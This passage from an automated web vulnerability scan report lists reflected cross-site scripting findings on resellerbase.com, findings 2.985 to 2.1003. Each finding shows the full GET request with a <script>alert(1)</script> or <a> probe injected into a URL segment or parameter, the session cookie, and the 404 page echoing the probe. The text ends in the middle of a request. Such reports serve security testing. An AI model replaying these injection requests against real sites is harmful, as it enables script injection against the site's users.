HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos70e97<script>alert(1)</script>8d4bb99e7c6/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.985. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f9a6e<script>alert(1)</script>04d1071b4d0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/search.phpf9a6e<script>alert(1)</script>04d1071b4d0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/search.phpf9a6e<script>alert(1)</script>04d1071b4d0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.986. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 8cd95<a>ef33957b622 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/search.php?keyword=search...&Submit3=Search8cd95<a>ef33957b622&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/search.php?keyword=search...&Submit3=Search8cd95<a>ef33957b622&opt=2 was not found on this server.</p>
...[SNIP]...

2.987. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e99f1<a>23f60e2f74a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/search.php?keyword=search...e99f1<a>23f60e2f74a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/search.php?keyword=search...e99f1<a>23f60e2f74a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.988. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f54e9<script>alert(1)</script>0168923071f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&f54e9<script>alert(1)</script>0168923071f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&f54e9<script>alert(1)</script>0168923071f=1 was not found on this server.</p>
...[SNIP]...

2.989. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload f2f25<a>33d05331e6c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2f2f25<a>33d05331e6c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2f2f25<a>33d05331e6c was not found on this server.</p>
...[SNIP]...

2.990. http://www.resellerbase.com/detail/11/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9ed24<script>alert(1)</script>c7af74ff6cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9ed24<script>alert(1)</script>c7af74ff6cc/11/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9ed24<script>alert(1)</script>c7af74ff6cc/11/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.991. http://www.resellerbase.com/detail/11/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e6bb3<script>alert(1)</script>6b2a949de1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11e6bb3<script>alert(1)</script>6b2a949de1e/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11e6bb3<script>alert(1)</script>6b2a949de1e/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.992. http://www.resellerbase.com/detail/11/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 217d6<script>alert(1)</script>5d290e7819d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes217d6<script>alert(1)</script>5d290e7819d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes217d6<script>alert(1)</script>5d290e7819d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.993. http://www.resellerbase.com/detail/11/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f3c3<script>alert(1)</script>c639e7c37b7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/search.php8f3c3<script>alert(1)</script>c639e7c37b7?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/search.php8f3c3<script>alert(1)</script>c639e7c37b7?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.994. http://www.resellerbase.com/detail/11/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload b5faa<a>20d2121d48b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/search.php?keyword=search...&Submit3=Searchb5faa<a>20d2121d48b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/search.php?keyword=search...&Submit3=Searchb5faa<a>20d2121d48b&opt=2 was not found on this server.</p>
...[SNIP]...

2.995. http://www.resellerbase.com/detail/11/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7c705<a>63d32368889 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/search.php?keyword=search...7c705<a>63d32368889&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/search.php?keyword=search...7c705<a>63d32368889&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.996. http://www.resellerbase.com/detail/11/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1f252<script>alert(1)</script>46482f6322b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/search.php?keyword=search...&Submit3=Search&opt=2&1f252<script>alert(1)</script>46482f6322b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/search.php?keyword=search...&Submit3=Search&opt=2&1f252<script>alert(1)</script>46482f6322b=1 was not found on this server.</p>
...[SNIP]...

2.997. http://www.resellerbase.com/detail/11/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload a424e<a>2ed0cddb2be was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/search.php?keyword=search...&Submit3=Search&opt=2a424e<a>2ed0cddb2be HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/search.php?keyword=search...&Submit3=Search&opt=2a424e<a>2ed0cddb2be was not found on this server.</p>
...[SNIP]...

2.998. http://www.resellerbase.com/detail/12/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 219b1<script>alert(1)</script>7e87dd1814a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail219b1<script>alert(1)</script>7e87dd1814a/12/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail219b1<script>alert(1)</script>7e87dd1814a/12/ was not found on this server.</p>
...[SNIP]...

2.999. http://www.resellerbase.com/detail/12/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 68629<script>alert(1)</script>f2fd1f598d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1268629<script>alert(1)</script>f2fd1f598d4/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1268629<script>alert(1)</script>f2fd1f598d4/ was not found on this server.</p>
...[SNIP]...

2.1000. http://www.resellerbase.com/detail/12/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7f6ff<script>alert(1)</script>060b96ed0a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/?7f6ff<script>alert(1)</script>060b96ed0a6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/?7f6ff<script>alert(1)</script>060b96ed0a6=1 was not found on this server.</p>
...[SNIP]...

2.1001. http://www.resellerbase.com/detail/12/fatcow-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/fatcow-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6c6fc<script>alert(1)</script>0ef9651729c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6c6fc<script>alert(1)</script>0ef9651729c/12/fatcow-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6c6fc<script>alert(1)</script>0ef9651729c/12/fatcow-com.html was not found on this server.</p>
...[SNIP]...

2.1002. http://www.resellerbase.com/detail/12/fatcow-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/12/fatcow-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 77174<a>859f1ffdcb4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/1277174<a>859f1ffdcb4/fatcow-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1277174<a>859f1ffdcb4/fatcow-com.html was not found on this server.</p>
...[SNIP]...

2.1003. http://www.resellerbase.com/detail/12/fatcow-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/fatcow-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2447c<script>alert(1)</script>258e67d5af5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/2447c<script>alert(1)</script>258e67d5af5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
